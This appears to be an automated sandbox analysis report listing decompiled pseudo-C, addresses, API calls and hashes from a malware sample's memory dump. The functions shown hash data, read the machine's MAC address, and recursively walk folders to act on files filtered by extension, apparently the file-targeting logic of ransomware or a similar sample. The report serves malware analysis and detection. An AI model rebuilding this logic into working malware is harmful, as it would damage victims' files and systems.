0x0040e987
0x0040e98e
0x0040e993
0x0040e9a2
0x0040e9a6
0x0040e9a8
0x0040e9b4
0x0040e9b4
0x0040e9b9
0x0040e9c0
0x0040e9d3
0x0040e9d8
0x0040e9df
0x0040e9f2
0x0040e9f5
0x0040e9f5
0x0040e9f8
0x0040e9f8
0x0040e9fa
0x0040e9fb
0x0040e9fb
0x0040ea04
0x0040ea08
0x0040ea0d
0x0040e9e1
0x0040e9e6
0x0040e9ea
0x0040e9ef
0x0040e9ef
0x00000000
0x0040e9df
0x0040ea11
0x0040ea1c
0x0040ea27
0x0040ea2d
0x0040ea31
0x0040ea36
0x0040ea3b
0x0040ea43
0x0040ea50
0x00000000

APIs

CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000,00000000), ref: 0040E8CE
__CxxThrowException@8.LIBCMT ref: 0040E8E4

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F

CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040E8F9
__CxxThrowException@8.LIBCMT ref: 0040E90F
CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 0040E928
__CxxThrowException@8.LIBCMT ref: 0040E93E
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0040E95D
__CxxThrowException@8.LIBCMT ref: 0040E96F
_memset.LIBCMT ref: 0040E98E
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040E9A2
__CxxThrowException@8.LIBCMT ref: 0040E9B4
_sprintf.LIBCMT ref: 0040E9D3

Strings

%.2X, xrefs: 0040E9CD

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
String ID: %.2X
API String ID: 1084002244-213608013
Opcode ID: 12faea4a726fdb76d454d3edf8160098b9ea6957ac25c5d069a7689ad03415f1
Instruction ID: 6020eefb82f776eec2353dc0ff897aa1862dcd4ecc30860888fbdadc8ba65bc1
Opcode Fuzzy Hash: 12faea4a726fdb76d454d3edf8160098b9ea6957ac25c5d069a7689ad03415f1
Instruction Fuzzy Hash: 835173B1E40209EBDF11DFA2DC46FEEBB78EB04704F10452AF501B61C1D7796A158BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040EAA0 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 159
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E0040EAA0(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				long* _v32;
				int _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				long** _t42;
				int* _t43;
				char _t45;
				char _t51;
				intOrPtr _t58;
				void* _t72;
				intOrPtr* _t80;
				void* _t86;
				void* _t87;
				void* _t88;
				int _t89;
				void* _t91;
				void* _t92;
				intOrPtr* _t93;
				void* _t94;
				intOrPtr _t96;
				intOrPtr _t97;
				void* _t99;

				 *[fs:0x0] = _t96;
				_t97 = _t96 - 0x38;
				_t73 = _a4;
				_v20 = _t97;
				_t88 = __ecx;
				_v32 = 0;
				_t92 = __edx;
				_v24 = 0;
				_v36 = 0;
				E004156D0(_a4, _t73, __ecx, 0x4ffca4);
				_t42 =  &_v32;
				_v8 = 0;
				__imp__CryptAcquireContextW(_t42, 0, 0, 1, 0xf0000000, 0, _t87, _t91, _t72,  *[fs:0x0], 0x4caa00, 0xffffffff);
				if(_t42 == 0) {
					_v40 = _t42;
					E00430ECA( &_v40, 0x5085b8);
				}
				_t43 =  &_v24;
				__imp__CryptCreateHash(_v32, 0x8003, 0, 0, _t43);
				if(_t43 == 0) {
					_v44 = _t43;
					_t43 = E00430ECA( &_v44, 0x5085b8);
				}
				__imp__CryptHashData(_v24, _t88, _t92, 0);
				if(_t43 == 0) {
					_v48 = _t43;
					E00430ECA( &_v48, 0x5085b8);
				}
				_t93 = __imp__CryptGetHashParam;
				_v28 = 0;
				_t45 =  *_t93(_v24, 2, 0,  &_v28, 0);
				_t105 = _t45;
				if(_t45 == 0) {
					_v52 = _t45;
					E00430ECA( &_v52, 0x5085b8);
				}
				_t89 = E00420BE4(_t73, _t88, _t105, _v28 + 1);
				_v36 = _t89;
				E0042B420(_t89, 0, _v28 + 1);
				_t99 = _t97 + 0x10;
				_t51 =  *_t93(_v24, 2, _t89,  &_v28, 0);
				if(_t51 == 0) {
					_v56 = _t51;
					E00430ECA( &_v56, 0x5085b8);
				}
				_t94 = 0;
				while(_t94 < _v28) {
					E004204A6( &_v72, "%.2X",  *(_t94 + _t89) & 0x000000ff);
					_t99 = _t99 + 0xc;
					if(_v72 != 0) {
						_t80 =  &_v72;
						_t35 = _t80 + 1; // 0x1
						_t86 = _t35;
						do {
							_t58 =  *_t80;
							_t80 = _t80 + 1;
							__eflags = _t58;
						} while (_t58 != 0);
						_push(_t80 - _t86);
						E00413EA0(_t73, _t73, _t89, _t94,  &_v72);
						_t94 = _t94 + 1;
					} else {
						_push(0);
						E00413EA0(_t73, _t73, _t89, _t94,  &_v72);
						_t94 = _t94 + 1;
					}
					L18:
				}
				E00422110(_t89);
				__imp__CryptDestroyHash(_v24);
				CryptReleaseContext(_v32, 0);
				 *[fs:0x0] = _v16;
				return 1;
				goto L18;
			}

0x0040eab1
0x0040eab8
0x0040eabc
0x0040eac1
0x0040eac4
0x0040eacf
0x0040ead6
0x0040ead8
0x0040eadf
0x0040eae6
0x0040eaf6
0x0040eaf9
0x0040eb01
0x0040eb09
0x0040eb0b
0x0040eb17
0x0040eb17
0x0040eb1c
0x0040eb2c
0x0040eb34
0x0040eb36
0x0040eb42
0x0040eb42
0x0040eb4e
0x0040eb56
0x0040eb58
0x0040eb64
0x0040eb64
0x0040eb69
0x0040eb7c
0x0040eb83
0x0040eb85
0x0040eb87
0x0040eb89
0x0040eb95
0x0040eb95
0x0040ebab
0x0040ebad
0x0040ebb4
0x0040ebb9
0x0040ebc8
0x0040ebcc
0x0040ebce
0x0040ebda
0x0040ebda
0x0040ebdf
0x0040ebe1
0x0040ebf4
0x0040ebf9
0x0040ec00
0x0040ec13
0x0040ec16
0x0040ec16
0x0040ec20
0x0040ec20
0x0040ec22
0x0040ec23
0x0040ec23
0x0040ec2c
0x0040ec30
0x0040ec35
0x0040ec02
0x0040ec07
0x0040ec0b
0x0040ec10
0x0040ec10
0x00000000
0x0040ec00
0x0040ec39
0x0040ec44
0x0040ec4f
0x0040ec5a
0x0040ec67
0x00000000

APIs

CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000), ref: 0040EB01
__CxxThrowException@8.LIBCMT ref: 0040EB17

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F

CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040EB2C
__CxxThrowException@8.LIBCMT ref: 0040EB42
CryptHashData.ADVAPI32(00000000,?,?,00000000), ref: 0040EB4E
__CxxThrowException@8.LIBCMT ref: 0040EB64
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,?,00000000), ref: 0040EB83
__CxxThrowException@8.LIBCMT ref: 0040EB95
_memset.LIBCMT ref: 0040EBB4
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040EBC8
__CxxThrowException@8.LIBCMT ref: 0040EBDA
_sprintf.LIBCMT ref: 0040EBF4
CryptDestroyHash.ADVAPI32(00000000), ref: 0040EC44
CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0040EC4F

Strings

%.2X, xrefs: 0040EBEE

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
String ID: %.2X
API String ID: 1637485200-213608013
Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
Instruction ID: 14d7d02cf3c54262bdef7e6fa07b3cadf7b2b7504ea62fb0b9d39e8d8664034d
Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
Instruction Fuzzy Hash: A6515371E40209ABDF11DBA6DC46FEFBBB8EB04704F14052AF505B62C1D77969058BA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040E670 Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E0040E670(void* __ebx, void* __ecx, void* __eflags) {
				char _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char* _t14;
				char* _t15;
				void* _t35;
				void* _t36;
				void* _t37;
				char* _t41;
				void* _t44;
				void* _t45;

				_t33 = __ebx;
				_push(_t36);
				_v8 = 0x288;
				_t37 = E00420C62(__ebx, _t35, _t36, 0x12);
				_t41 = E00420C62(__ebx, _t35, _t37, 0x288);
				_t45 = _t44 + 8;
				_t49 = _t41;
				if(_t41 != 0) {
					_t14 =  &_v8;
					__imp__GetAdaptersInfo(_t41, _t14);
					__eflags = _t14 - 0x6f;
					if(_t14 != 0x6f) {
						L4:
						_t15 =  &_v8;
						__imp__GetAdaptersInfo(_t41, _t15);
						__eflags = _t15;
						if(_t15 == 0) {
							_push( *(_t41 + 0x199) & 0x000000ff);
							_push( *(_t41 + 0x198) & 0x000000ff);
							_push( *(_t41 + 0x197) & 0x000000ff);
							_push( *(_t41 + 0x196) & 0x000000ff);
							_push( *(_t41 + 0x195) & 0x000000ff);
							E004204A6(_t37, "%02X:%02X:%02X:%02X:%02X:%02X",  *(_t41 + 0x194) & 0x000000ff);
							_push(_t37);
							_t11 = _t41 + 0x1b0; // 0x1b0
							_push("Address: %s, mac: %s\n");
							E00421F2D(_t33, _t37, _t41, __eflags);
							_push("\n");
							E00421F2D(_t33, _t37, _t41, __eflags);
							_t45 = _t45 + 0x30;
						}
						E00420BED(_t41);
						return _t37;
					} else {
						E00420BED(_t41);
						_t41 = E00420C62(_t33, _t35, _t37, _v8);
						_t45 = _t45 + 8;
						__eflags = _t41;
						if(__eflags == 0) {
							goto L1;
						} else {
							goto L4;
						}
					}
				} else {
					L1:
					_push("Error allocating memory needed to call GetAdaptersinfo\n");
					E00421F2D(_t33, _t37, _t41, _t49);
					E00420BED(_t37);
					return 0;
				}
			}

0x0040e670
0x0040e675
0x0040e678
0x0040e689
0x0040e690
0x0040e692
0x0040e695
0x0040e697
0x0040e6b4
0x0040e6b9
0x0040e6bf
0x0040e6c2
0x0040e6db
0x0040e6db
0x0040e6e0
0x0040e6e6
0x0040e6e8
0x0040e6f1
0x0040e6f9
0x0040e701
0x0040e709
0x0040e711
0x0040e720
0x0040e725
0x0040e726
0x0040e72d
0x0040e732
0x0040e737
0x0040e73c
0x0040e741
0x0040e741
0x0040e745
0x0040e754
0x0040e6c4
0x0040e6c5
0x0040e6d2
0x0040e6d4
0x0040e6d7
0x0040e6d9
0x00000000
0x00000000
0x00000000
0x00000000
0x0040e6d9
0x0040e699
0x0040e699
0x0040e699
0x0040e69e
0x0040e6a4
0x0040e6b3
0x0040e6b3

APIs

_malloc.LIBCMT ref: 0040E67F

Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(005C0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5

_malloc.LIBCMT ref: 0040E68B
_wprintf.LIBCMT ref: 0040E69E
_free.LIBCMT ref: 0040E6A4

Part of subcall function 00420BED: RtlFreeHeap.NTDLL(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13

GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6B9
_free.LIBCMT ref: 0040E6C5
_malloc.LIBCMT ref: 0040E6CD
GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6E0
_sprintf.LIBCMT ref: 0040E720
_wprintf.LIBCMT ref: 0040E732
_wprintf.LIBCMT ref: 0040E73C
_free.LIBCMT ref: 0040E745

Strings

Address: %s, mac: %s, xrefs: 0040E72D
Error allocating memory needed to call GetAdaptersinfo, xrefs: 0040E699
%02X:%02X:%02X:%02X:%02X:%02X, xrefs: 0040E71A

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocateErrorFreeLast_sprintf
String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
API String ID: 3901070236-1604013687
Opcode ID: 3662c7b498418dd0805699ed7e156d37d96e3abec8e0c242f5b97c865e313c7a
Instruction ID: 1f0497fb971ee708fef02f82321736b2a43cb7681c3985dbc626545fd8dc3fd8
Opcode Fuzzy Hash: 3662c7b498418dd0805699ed7e156d37d96e3abec8e0c242f5b97c865e313c7a
Instruction Fuzzy Hash: 251127B2A045647AC27162F76C02FFF3ADC8F45705F84056BFA98E1182EA5D5A0093B9

Uniqueness

Uniqueness Score: -1.00%

Function 00410160 Relevance: 26.2, APIs: 17, Instructions: 660
COMMONCrypto

Download Yara Rule

C-Code - Quality: 75%

			E00410160(intOrPtr __ecx, intOrPtr* __edx, char _a4, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				char _v40;
				signed int _v44;
				signed int _v48;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				signed int _v76;
				signed int _v80;
				char _v96;
				signed int _v100;
				signed int _v104;
				WCHAR* _v108;
				short _v120;
				signed int _v124;
				signed int _v128;
				char _v144;
				intOrPtr* _v148;
				struct _WIN32_FIND_DATAW _v740;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t270;
				intOrPtr _t280;
				WCHAR* _t288;
				short _t291;
				signed int _t293;
				signed int _t294;
				signed int _t298;
				signed int _t299;
				intOrPtr _t303;
				WCHAR* _t308;
				void* _t309;
				void* _t313;
				void* _t330;
				signed int _t334;
				WCHAR* _t335;
				WCHAR* _t346;
				WCHAR* _t348;
				void* _t405;
				void* _t411;
				intOrPtr _t413;
				intOrPtr _t414;
				void* _t415;
				intOrPtr* _t418;
				signed int _t420;
				intOrPtr* _t423;
				signed int _t425;
				char* _t431;
				char* _t432;
				intOrPtr* _t434;
				signed int _t436;
				intOrPtr* _t439;
				intOrPtr* _t441;
				short* _t445;
				short* _t447;
				signed int _t450;
				signed int _t453;
				WCHAR* _t454;
				short* _t455;
				signed int _t460;
				intOrPtr* _t468;
				void* _t470;
				void* _t471;
				void* _t472;
				intOrPtr _t475;
				intOrPtr _t476;
				signed int _t477;
				signed int _t480;
				void* _t481;
				void* _t482;
				WCHAR* _t484;
				intOrPtr _t490;
				signed int* _t491;
				void* _t492;
				WCHAR* _t494;
				short _t495;
				intOrPtr _t496;
				void* _t497;
				void* _t498;
				short* _t501;
				short* _t502;
				void* _t503;
				short* _t504;

				_push(0xffffffff);
				_push(0x4cab68);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t496;
				_t497 = _t496 - 0x2d4;
				_t410 = __edx;
				_v72 = __ecx;
				_v148 = __edx;
				_v8 = 0;
				E00411AB0();
				_t480 = 0;
				_t490 = (0x2aaaaaab * ( *((intOrPtr*)(__edx + 4)) -  *__edx) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *((intOrPtr*)(__edx + 4)) -  *__edx) >> 0x20 >> 2);
				_v68 = _t490;
				if(_t490 == 0) {
					L15:
					_v76 = 7;
					_v80 = 0;
					_v96 = 0;
					_v8 = 3;
					_push(0xffffffff);
					_v44 = 7;
					 *((intOrPtr*)(_v72 + 0x8bc)) = 1;
					_v64 = 0;
					_v48 = 0;
					E00414690(_t410,  &_v64,  &_a4, 0);
					_v8 = 4;
					_t411 = PathFindFileNameW;
					_t267 =  >=  ? _v64 :  &_v64;
					_t468 = PathFindFileNameW( >=  ? _v64 :  &_v64);
					_v20 = 7;
					_v24 = 0;
					_v40 = 0;
					if( *_t468 != 0) {
						_t418 = _t468;
						_t79 = _t418 + 2; // 0x2
						_t490 = _t79;
						do {
							_t270 =  *_t418;
							_t418 = _t418 + 2;
						} while (_t270 != 0);
						_t420 = _t418 - _t490 >> 1;
						L24:
						_push(_t420);
						E00415C10(_t411,  &_v40, _t480, _t490, _t468);
						_v8 = 5;
						_t491 = E00413520( &_v64,  &_v144, 0, _v48 - _v24);
						if( &_v64 != _t491) {
							if(_v44 >= 8) {
								L00422587(_v64);
								_t497 = _t497 + 4;
							}
							_v44 = 7;
							_v48 = 0;
							_v64 = 0;
							if(_t491[5] >= 8) {
								_v64 =  *_t491;
								 *_t491 = 0;
							} else {
								_t384 = _t491[4] + 1;
								if(_t491[4] + 1 != 0) {
									E004205A0( &_v64, _t491, _t384 + _t384);
									_t497 = _t497 + 0xc;
								}
							}
							_v48 = _t491[4];
							_v44 = _t491[5];
							_t491[5] = 7;
							_t491[4] = 0;
							 *_t491 = 0;
						}
						if(_v124 >= 8) {
							L00422587(_v144);
							_t497 = _t497 + 4;
						}
						_t481 = 0;
						while(_v48 != 0 || _v24 != 0) {
							_t481 = _t481 + 1;
							_t278 =  >=  ? _v64 :  &_v64;
							_t468 = PathFindFileNameW( >=  ? _v64 :  &_v64);
							if( *_t468 != 0) {
								_t423 = _t468;
								_t109 = _t423 + 2; // 0x2
								_t491 = _t109;
								do {
									_t280 =  *_t423;
									_t423 = _t423 + 2;
								} while (_t280 != 0);
								_t425 = _t423 - _t491 >> 1;
								L42:
								_push(_t425);
								E00415C10(_t411,  &_v40, _t481, _t491, _t468);
								_t491 = E00413520( &_v64,  &_v144, 0, _v48 - _v24);
								if( &_v64 != _t491) {
									if(_v44 >= 8) {
										L00422587(_v64);
										_t497 = _t497 + 4;
									}
									_v44 = 7;
									_v48 = 0;
									_v64 = 0;
									if(_t491[5] >= 8) {
										_v64 =  *_t491;
										 *_t491 = 0;
									} else {
										_t372 = _t491[4] + 1;
										if(_t491[4] + 1 != 0) {
											E004205A0( &_v64, _t491, _t372 + _t372);
											_t497 = _t497 + 0xc;
										}
									}
									_v48 = _t491[4];
									_v44 = _t491[5];
									_t491[5] = 7;
									_t491[4] = 0;
									 *_t491 = 0;
								}
								if(_v124 >= 8) {
									L00422587(_v144);
									_t497 = _t497 + 4;
								}
								continue;
							}
							_t425 = 0;
							goto L42;
						}
						if(_t481 > 3) {
							L73:
							if(_v20 >= 8) {
								L00422587(_v40);
								_t497 = _t497 + 4;
							}
							_v8 = 3;
							_v20 = 7;
							_v24 = 0;
							_v40 = 0;
							if(_v44 >= 8) {
								L00422587(_v64);
								_t497 = _t497 + 4;
							}
							_t288 = E00417140( &_v144,  &_a4, "*");
							_t498 = _t497 + 4;
							if(_t288[0xa] >= 8) {
								_t288 =  *_t288;
							}
							_t482 = FindFirstFileW(_t288,  &_v740);
							if(_v124 >= 8) {
								L00422587(_v144);
								_t498 = _t498 + 4;
							}
							_v124 = 7;
							_t492 = 0;
							_v128 = 0;
							_v144 = 0;
							if(_t482 == 0xffffffff) {
								L119:
								if(_v76 >= 8) {
									L00422587(_v96);
									_t498 = _t498 + 4;
								}
								_t291 = 0;
								_v76 = 7;
								_v80 = 0;
								_v96 = 0;
								goto L122;
							} else {
								_t413 = _a28;
								do {
									_t431 = ".";
									_t293 =  &(_v740.cFileName);
									while(1) {
										_t470 =  *_t293;
										if(_t470 !=  *_t431) {
											break;
										}
										if(_t470 == 0) {
											L88:
											_t294 = 0;
											L90:
											if(_t294 == 0) {
												goto L117;
											}
											_t432 = L"..";
											_t298 =  &(_v740.cFileName);
											while(1) {
												_t471 =  *_t298;
												if(_t471 !=  *_t432) {
													break;
												}
												if(_t471 == 0) {
													L96:
													_t299 = 0;
													L98:
													if(_t299 == 0) {
														goto L117;
													}
													if((_v740.dwFileAttributes & 0x00000010) == 0) {
														_t492 = _t492 + 1;
														if(_t492 >= 0x400) {
															_t492 = 0;
															E00411AB0();
														}
														_v20 = 7;
														_push(0xffffffff);
														_v40 = 0;
														_v24 = 0;
														E00414690(_t413,  &_v40,  &_a4, 0);
														_v8 = 9;
														if(_v740.cFileName != 0) {
															_t434 =  &(_v740.cFileName);
															_t231 = _t434 + 2; // 0x2
															_t472 = _t231;
															do {
																_t303 =  *_t434;
																_t434 = _t434 + 2;
															} while (_t303 != 0);
															_t436 = _t434 - _t472 >> 1;
															goto L108;
														} else {
															_t436 = 0;
															L108:
															_push(_t436);
															E00415AE0(_t413,  &_v40, _t482, _t492,  &(_v740.cFileName));
															_t307 =  >=  ? _v40 :  &_v40;
															_t308 = PathFindExtensionW( >=  ? _v40 :  &_v40);
															_t439 = _v72 + 0x868;
															if( *((intOrPtr*)(_t439 + 0x14)) >= 8) {
																_t439 =  *_t439;
															}
															_push(_t308);
															_push(_t439);
															_t309 = E00421C02(_t439);
															_t498 = _t498 + 8;
															if(_t309 == 0) {
																_t441 = _v72 + 0x820;
																if( *((intOrPtr*)(_t441 + 0x14)) >= 8) {
																	_t441 =  *_t441;
																}
																_push(_t441);
																_t312 =  >=  ? _v40 :  &_v40;
																_push( >=  ? _v40 :  &_v40);
																_t313 = E00421C02(_t441);
																_t498 = _t498 + 8;
																if(_t313 == 0) {
																	E004136C0(_t413,  &_v40);
																}
															}
															L115:
															_v8 = 3;
															if(_v20 >= 8) {
																L00422587(_v40);
																_t498 = _t498 + 4;
															}
															goto L117;
														}
													}
													E00417140( &_v40,  &_a4,  &(_v740.cFileName));
													_push(1);
													_v8 = 8;
													E00415AE0(_t413,  &_v40, _t482, _t492, "\\");
													_push(_t413);
													_t501 = _t498 + 4 - 0x18;
													_t445 = _t501;
													_push(0xffffffff);
													 *(_t445 + 0x14) = 7;
													 *(_t445 + 0x10) = 0;
													 *_t445 = 0;
													E00414690(_t413, _t445,  &_v40, 0);
													E00410160(_v72, _v148);
													_t498 = _t501 + 0x1c;
													goto L115;
												}
												_t475 =  *((intOrPtr*)(_t298 + 2));
												_t209 =  &(_t432[2]); // 0x2e
												if(_t475 !=  *_t209) {
													break;
												}
												_t298 = _t298 + 4;
												_t432 =  &(_t432[4]);
												if(_t475 != 0) {
													continue;
												}
												goto L96;
											}
											asm("sbb eax, eax");
											_t299 = _t298 | 0x00000001;
											goto L98;
										}
										_t476 =  *((intOrPtr*)(_t293 + 2));
										_t206 =  &(_t431[2]); // 0x2e0000
										if(_t476 !=  *_t206) {
											break;
										}
										_t293 = _t293 + 4;
										_t431 =  &(_t431[4]);
										if(_t476 != 0) {
											continue;
										}
										goto L88;
									}
									asm("sbb eax, eax");
									_t294 = _t293 | 0x00000001;
									goto L90;
									L117:
								} while (FindNextFileW(_t482,  &_v740) != 0);
								FindClose(_t482);
								goto L119;
							}
						}
						_t502 = _t497 - 0x18;
						_t447 = _t502;
						_push(0xffffffff);
						 *(_t447 + 0x14) = 7;
						 *(_t447 + 0x10) = 0;
						 *_t447 = 0;
						E00414690(_t411, _t447,  &_a4, 0);
						_t330 = E0040F310(_t481, _t491);
						_t497 = _t502 + 0x18;
						if(_t330 != 0) {
							goto L73;
						}
						_push(0xffffffff);
						E00414690(_t411,  &_v96,  &_a4, 0);
						E00413A90(_t411,  &_v108, _t481, 0x400);
						_v8 = 6;
						_t450 = 0;
						_t334 = _v80;
						_t494 = _v108;
						if(_t334 == 0) {
							L57:
							_t414 = _v72;
							 *((short*)(_t494 + 2 + _t334 * 2)) = 0;
							_t335 = _t414 + 0x820;
							if(_t335[0xa] >= 8) {
								_t335 =  *_t335;
							}
							PathAppendW(_t494, _t335);
							_push(_v68);
							_v124 = 7;
							_v128 = 0;
							_v144 = 0;
							E00418400( &_v144, _t494, _v104);
							if(_v76 >= 8) {
								L00422587(_v96);
								_t497 = _t497 + 4;
							}
							_t453 = _v124;
							_v76 = 7;
							_v80 = 0;
							_v96 = 0;
							if(_t453 >= 8) {
								_v96 = _v144;
							} else {
								_t356 = _v128 + 1;
								if(_v128 + 1 != 0) {
									E004205A0( &_v96,  &_v144, _t356 + _t356);
									_t453 = _v124;
									_t497 = _t497 + 0xc;
								}
							}
							_v80 = _v128;
							_t343 =  >=  ? _v96 :  &_v96;
							_v76 = _t453;
							if(PathFileExistsW( >=  ? _v96 :  &_v96) == 0) {
								_t346 = E00420C62(_t414, _t468, _t481, 0x7d00);
								_t454 = _t414 + 0x838;
								_t503 = _t497 + 4;
								_t484 = _t346;
								if(_t454[0xa] >= 8) {
									_t454 =  *_t454;
								}
								lstrcpyW(_t484, _t454);
								_t348 = _t414 + 0x850;
								if( *((intOrPtr*)(_t414 + 0x864)) >= 8) {
									_t348 =  *_t348;
								}
								lstrcatW(_t484, _t348);
								_t504 = _t503 - 0x18;
								_t455 = _t504;
								_push(0xffffffff);
								 *(_t455 + 0x14) = 7;
								 *(_t455 + 0x10) = 0;
								 *_t455 = 0;
								E00414690(_t414, _t455,  &_v96, 0);
								E0040F0E0(_t484);
								E00420BED(_t484);
								_t497 = _t504 + 0x1c;
							}
							if(_t494 != 0) {
								L00422587(_t494);
								_t497 = _t497 + 4;
							}
							goto L73;
						}
						do {
							_t363 =  >=  ? _v96 :  &_v96;
							_t494[_t450] = ( >=  ? _v96 :  &_v96)[_t450];
							_t450 = _t450 + 1;
							_t334 = _v80;
						} while (_t450 < _t334);
						goto L57;
					}
					_t420 = 0;
					goto L24;
				} else {
					_t415 = 0;
					do {
						_v20 = 7;
						_push(0xffffffff);
						_v40 = 0;
						_v24 = 0;
						E00414690(_t415,  &_v40,  &_a4, 0);
						_v8 = 1;
						_push(0xffffffff);
						_v120 = 0;
						_v100 = 7;
						_v104 = 0;
						E00414690(_t415,  &_v120,  *_v148 + _t415, 0);
						_v8 = 2;
						_t477 = _v24;
						if(_t477 <= 1) {
							L10:
							if(_v100 >= 8) {
								L00422587(_v120);
								_t497 = _t497 + 4;
							}
							_v100 = 7;
							_v8 = 0;
							_v104 = 0;
							_v120 = 0;
							if(_v20 >= 8) {
								L00422587(_v40);
								_t497 = _t497 + 4;
							}
							goto L14;
						}
						_t460 = _v104;
						if(_t460 <= 1) {
							goto L10;
						} else {
							_t400 =  >=  ? _v40 :  &_v40;
							if( *((short*)(( >=  ? _v40 :  &_v40) + _t477 * 2 - 2)) != 0x5c) {
								_push(1);
								E00415AE0(_t415,  &_v40, _t480, _t490, "\\");
								_t460 = _v104;
							}
							_t495 = _v120;
							_t402 =  >=  ? _t495 :  &_v120;
							if( *((short*)(( >=  ? _t495 :  &_v120) + _t460 * 2 - 2)) != 0x5c) {
								_push(1);
								E00415AE0(_t415,  &_v120, _t480, _t495, "\\");
								_t495 = _v120;
							}
							_t462 =  >=  ? _t495 :  &_v120;
							_t404 =  >=  ? _v40 :  &_v40;
							_t405 = E00420235(_t415, _t480, _t495,  >=  ? _v40 :  &_v40,  >=  ? _t495 :  &_v120);
							_t498 = _t497 + 8;
							if(_t405 == 0) {
								if(_v100 >= 8) {
									L00422587(_v120);
									_t498 = _t498 + 4;
								}
								_t291 = 0;
								_v100 = 7;
								_v104 = 0;
								_v120 = 0;
								if(_v20 >= 8) {
									_t291 = L00422587(_v40);
									_t498 = _t498 + 4;
								}
								L122:
								if(_a24 >= 8) {
									_t291 = L00422587(_a4);
								}
								 *[fs:0x0] = _v16;
								return _t291;
							} else {
								_t490 = _v68;
								goto L10;
							}
						}
						L14:
						_t480 = _t480 + 1;
						_t415 = _t415 + 0x18;
					} while (_t480 < _t490);
					goto L15;
				}
			}

0x00410163
0x00410165
0x00410170
0x00410171
0x00410178
0x00410180
0x00410182
0x00410186
0x0041018c
0x00410193
0x004101a2
0x004101b1
0x004101b3
0x004101b6
0x004102e8
0x004102ea
0x004102f1
0x004102f8
0x00410302
0x00410306
0x00410308
0x0041030f
0x0041031c
0x00410324
0x0041032b
0x00410330
0x0041033b
0x00410341
0x00410348
0x0041034a
0x00410353
0x0041035a
0x00410361
0x004103a6
0x004103a8
0x004103a8
0x004103b0
0x004103b0
0x004103b3
0x004103b6
0x004103bd
0x004103bf
0x004103bf
0x004103c4
